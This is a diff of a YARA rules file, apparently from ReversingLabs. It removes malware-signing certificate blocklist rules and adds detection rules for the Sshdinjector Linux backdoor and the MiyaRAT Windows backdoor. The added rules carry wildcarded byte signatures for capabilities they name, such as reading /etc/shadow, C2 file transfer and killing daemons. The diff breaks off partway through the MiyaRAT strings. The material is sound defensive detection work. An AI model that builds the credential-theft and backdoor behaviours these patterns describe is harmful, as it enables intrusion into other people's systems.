-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DocsGen Software Solutions Inc." and ( pe.signatures [ i ] . serial == "00:f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21" or pe.signatures [ i ] . serial == "f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21" ) and 1599523200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $download_file_from_c2 ) and ( $upload_file_to_c2 ) and ( all of ( $get_logical_drive_data_p* ) ) and ( all of ( $get_os_information_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_70E1Ebd170Db8102D8C28E58392E5632 : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Sshdinjector : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Sshdinjector backdoor."
 		author = "ReversingLabs"
-		id = "e3b0f68c-8cc9-5275-988a-8d955ea25a47"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "781d7a64-0908-5aa8-a178-cffe52e78036"
+		date = "2025-03-27"
+		modified = "2025-03-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5158-L5174"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.Sshdinjector.yara#L1-L197"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e1738eddc1da0876a373ee7f35bff155d56c1b98a23cb117c0e7a966f8fa3c92"
+		logic_hash = "9370b59a3317ac14b5791723411216315e480fad7419d248aaed42a19312da0c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Sshdinjector"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Equal Cash Technologies Limited" and pe.signatures [ i ] . serial == "70:e1:eb:d1:70:db:81:02:d8:c2:8e:58:39:2e:56:32" and 1599264000 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_09C89De6F64A7Fdf657E69353C5Fdd44 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "f86eafb5-ec59-58c5-b5f9-01a6704fb555"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5176-L5192"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1cb57cd68cda91754307d2e4d94ea011975bbfff0f15134081a5aa11870b0db1"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$kill_and_restart_daemons_p1 = {
+            55 48 89 E5 48 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 8D 55
+            ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 D7 F3 48 AB 48 89 FA 89 02 48 83 C2 ?? 48 8D
+            95 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 D7 F3 48 AB 48 89 FA 89 02 48 83
+            C2 ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7
+            40 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
+            89 C1 BA ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C6 48 8B 05 ?? ?? ?? ?? 48 89 C7 E8
+            ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 48
+            8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 48 8B 05 ??
+            ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 8D 85 ??
+            ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74
+        }
+		$kill_and_restart_daemons_p2 = {
+            48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? 48
+            8B 05 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
+            48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
+            89 C7 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 94 C0 84 C0 0F 84 ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 81 7D
+            ?? ?? ?? ?? ?? 0F 9E C0 84 C0 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 48 8D 45
+            ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7
+            E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? C9 C3
+        }
+		$network_communication_p1 = {
+            55 48 89 E5 41 54 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ??
+            ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8D 78 ?? E8 ?? ?? ?? ?? 48 8D 50 ?? 48 8B 05 ??
+            ?? ?? ?? 48 8D 04 02 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 66 89 45 ?? 48
+            8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 83 C0 ?? 48 03 45 ?? 48 89 45 ?? 48 8B 45 ?? 48
+            89 C7 E8 ?? ?? ?? ?? 66 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 83 C0 ?? 48
+            03 45 ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 C2 48 8B 05 ?? ?? ?? ??
+            66 89 10 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8D
+            71 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 0F B7 00 0F B7 C8 0F B7 55 ?? 0F
+            B7 45 ?? 41 89 C8 89 D1 89 C2 48 8B 05 ?? ?? ?? ?? 48 8D 70 ?? 48 8D 3D ?? ?? ?? ??
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05
+            ?? ?? ?? ?? 0F B7 00 66 85 C0 0F 84 ?? ?? ?? ?? 44 0F B7 65 ?? 0F B7 5D ?? 48 8D 45
+            ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 45 ?? 48 89 CE 48
+        }
+		$network_communication_p2 = {
+            89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 4C 8D 05 ?? ?? ?? ?? B9 ?? ?? ?? ?? 44 89 E2 89 DE
+            48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3
+            49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 89 D3 49 89 C4
+            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D
+            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 44
+            0F B7 65 ?? 0F B7 5D ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 8D ??
+            ?? ?? ?? 48 8D 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 4C 8D 05 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? 44 89 E2 89 DE 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8D 45 ?? 48
+            89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89
+            E0 48 63 D3 EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63
+            D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7
+            E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 41 5C C9 C3
+        }
+		$read_etc_shadow_p1 = {
+            55 48 89 E5 41 54 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89
+            95 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 55 ?? 48
+            8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45
+            ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
+            89 C7 E8 ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ??
+            ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 8D
+            85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85
+            ?? ?? ?? ?? 48 83 C0 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89
+            D6 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ??
+            48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? BB ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? 48 8D 3D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 41 BC ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 55
+            ?? 41 B9 ?? ?? ?? ?? 41 89 D0 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75 ?? 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? 48 8D
+            3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B
+            45 ?? 48 89 45 ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
+            ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 0F B6 00
+        }
+		$read_etc_shadow_p2 = {
+            3C ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 0F B6 00 3C ?? 0F 84 ?? ?? ?? ?? 48
+            8B 45 ?? 89 C2 48 8B 45 ?? 89 D1 29 C1 89 C8 89 45 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
+            ?? ?? 8B 45 ?? 48 63 D0 48 8D 4D ?? 48 8B 5D ?? 48 8D 45 ?? 48 89 DE 48 89 C7 E8 ??
+            ?? ?? ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49 89
+            C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 45 ?? 48 89 C7
+            E8 ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48
+            63 D3 E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 95 ?? ??
+            ?? ?? 48 83 C2 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 35 ?? ?? ?? ??
+            48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 74 ?? 48 8B 45 ?? 48 83 C0 ?? 48
+            89 45 ?? 48 8B 85 ?? ?? ?? ?? 48 03 45 ?? 48 3B 45 ?? 0F 97 C0 84 C0 0F 85 ?? ?? ??
+            ?? EB ?? 90 EB ?? 90 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C2 48
+            8B 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B
+            9D ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 89 DE 48 89 C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? EB
+            ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D
+            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ??
+            89 D3 49 89 C4 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ??
+            48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ??
+            ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3
+            48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 74 ?? EB ?? 44 89
+            E0 48 81 C4 ?? ?? ?? ?? 5B 41 5C C9 C3
+        }
+		$list_running_services_p1 = {
+            55 48 89 E5 41 57 41 56 41 55 41 54 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 89
+            B5 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
+            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ??
+            48 8D 55 ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49
+            89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 E9 ?? ?? ?? ?? 48 8D 45
+            ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 83 C0 ?? 48 8D 35 ?? ?? ?? ?? 48
+            89 C7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ??
+            ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ??
+            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 41 BF ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
+            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 0F 94 C0 84 C0 74 ??
+            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 41 BF ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8
+            ?? ?? ?? ?? 48 89 45 ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 4D ?? 48 8D 15 ??
+            ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 50 ?? 48 8D 85 ?? ?? ??
+            ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48
+        }
+		$list_running_services_p2 = {
+            8D 95 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 0F 85 ?? ?? ?? ??
+            BB ?? ?? ?? ?? 41 BC ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ??
+            ?? 41 BE ?? ?? ?? ?? 48 8B 45 ?? 48 8D 48 ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 CE 48 89
+            C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
+            ?? ?? 84 C0 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? 48 8B 45 ??
+            48 8D 48 ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 41 BD ?? ?? ??
+            ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? B8 ?? ?? ??
+            ?? EB ?? B8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 45 84 ED 75 ?? EB ?? 41 89 D7 48 89 85 ??
+            ?? ?? ?? 45 84 ED 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 49
+            63 D7 EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 41 89 D5 49 89 C7 45 84 E4 74
+            ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 F8 49 63 D5 41 89 D4 49 89 C5 84 DB 74
+            ?? EB ?? 45 84 E4 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48 89
+            C7 E8 ?? ?? ?? ?? 4C 89 E8 49 63 D4 EB ?? 84 DB 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
+            ?? ?? EB ?? 89 D3 49 89 C4 45 84 F6 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89
+            E0 48 63 D3 EB ?? 45 84 F6 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 80 BD ?? ?? ??
+            ?? ?? 74 ?? 48 8B 45 ?? 48 8D 50 ?? 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48
+        }
+		$list_running_services_p3 = {
+            8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8D 45 ?? 48 8D 95 ?? ?? ?? ?? 48 83 C2 ?? 48 89 C6 48 89 D7 E8 ?? ?? ??
+            ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? EB ?? 89 D3 49 89 C4 48 8D 85 ??
+            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 85 ?? ?? ?? ?? 48 89
+            C7 E8 ?? ?? ?? ?? 48 83 7D ?? ?? 0F 95 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8B 45 ?? 48 89
+            C7 E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 48 8B 85
+            ?? ?? ?? ?? 89 DE 48 89 C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D
+            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
+            ?? ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45
+            ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ??
+            ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 85 ??
+            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85
+            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 74 ?? EB ?? 44 89 F8 48 81 C4 ?? ?? ?? ??
+            5B 41 5C 41 5D 41 5E 41 5F C9 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXON RENTAL SP Z O O" and pe.signatures [ i ] . serial == "09:c8:9d:e6:f6:4a:7f:df:65:7e:69:35:3c:5f:dd:44" and 1601337601 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( all of ( $kill_and_restart_daemons_p* ) ) and ( all of ( $network_communication_p* ) ) and ( all of ( $read_etc_shadow_p* ) ) and ( all of ( $list_running_services_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Ffff2Ce862378B26440Df49Ca9175B70 : INFO FILE
+rule REVERSINGLABS_Win64_Backdoor_Miyarat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects MiyaRAT backdoor."
 		author = "ReversingLabs"
-		id = "d5d1e84d-328f-53ac-adb6-3824fa77a47d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "1c5ae79a-9760-5622-909c-76bb47721ed4"
+		date = "2025-02-27"
+		modified = "2025-02-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5194-L5212"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.MiyaRAT.yara#L1-L264"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8ed7b0643b07ce4954f570157e1534ee1ed647717cce00fe7f2b572c9b5d0042"
+		logic_hash = "a06deed11a7bdaa17b4cb69da1bd66ff2f2072af8cf4081f7481a51e4567135d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "MiyaRAT"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F & A.TIM d.o.o." and ( pe.signatures [ i ] . serial == "00:ff:ff:2c:e8:62:37:8b:26:44:0d:f4:9c:a9:17:5b:70" or pe.signatures [ i ] . serial == "ff:ff:2c:e8:62:37:8b:26:44:0d:f4:9c:a9:17:5b:70" ) and 1576195200 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_3223B4616C2687C04865Bee8321726A8 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "089aae56-4f46-563c-800a-dbf57db2bde6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5214-L5230"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fcb0a14866b3612c5ec5a7db7a3333e20a4605695b3d019eef84de85d7b3ea4d"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$get_disk_information_p1 = {
+            48 8B C4 48 89 58 ?? 48 89 70 ?? 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ?? 0F
+            29 70 ?? 0F 29 78 ?? 44 0F 29 40 ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ??
+            ?? ?? 48 8B D9 48 89 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 45 33 ED 45 8B E5 44
+            89 6C 24 ?? FF 15 ?? ?? ?? ?? 8B F0 89 84 24 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ??
+            ?? ?? 0F 57 C9 F3 0F 7F 8C 24 ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24
